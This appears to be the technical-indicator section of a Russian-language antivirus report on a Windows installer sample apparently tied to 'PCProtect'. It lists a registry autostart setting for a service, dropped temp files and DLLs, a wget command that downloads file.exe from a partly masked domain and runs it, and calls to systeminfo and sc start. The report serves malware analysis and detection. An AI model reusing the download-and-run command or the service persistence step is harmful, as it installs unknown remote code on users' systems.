Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\ProtectMonitor] 'Start' = '00000002'
- 'C:\wget.exe' -q -O "C:\file.exe" "http://so####re-cdn.net/deliver/intl/v4/file.exe"
- '%TEMP%\nsl2.tmp\ns6.tmp' C:\file.exe
- 'C:\file.exe'
- '%TEMP%\nsl2.tmp\ns3.tmp' sc start "PCProtect"
- '%TEMP%\nsl2.tmp\ns4.tmp' systeminfo
- '%TEMP%\nsl2.tmp\ns5.tmp' C:\wget.exe -q -O "C:\file.exe" "http://so####re-cdn.net/deliver/intl/v4/file.exe"
- 'C:\file.exe' (загружен из сети Интернет)
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\sc.exe' start "PCProtect"
- C:\wget.exe
- %TEMP%\nsl2.tmp\ns4.tmp
- %TEMP%\nsl2.tmp\ns5.tmp
- %TEMP%\nsl2.tmp\ns6.tmp
- C:\file.exe
- %TEMP%\nsl2.tmp\ns3.tmp
- %TEMP%\nsl2.tmp\nsExec.dll
- C:\monitorsvc.exe
- %TEMP%\nsl2.tmp\SimpleSC.dll
- %TEMP%\nsl2.tmp\ns6.tmp
- %TEMP%\nsl2.tmp\nsExec.dll
- %TEMP%\nsl2.tmp\SimpleSC.dll
- %TEMP%\nsl2.tmp\ns3.tmp
- %TEMP%\nsl2.tmp\ns4.tmp
- %TEMP%\nsl2.tmp\ns5.tmp
- 'so####re-cdn.net':80
- so####re-cdn.net/deliver/intl/v4/file.exe
- DNS ASK so####re-cdn.net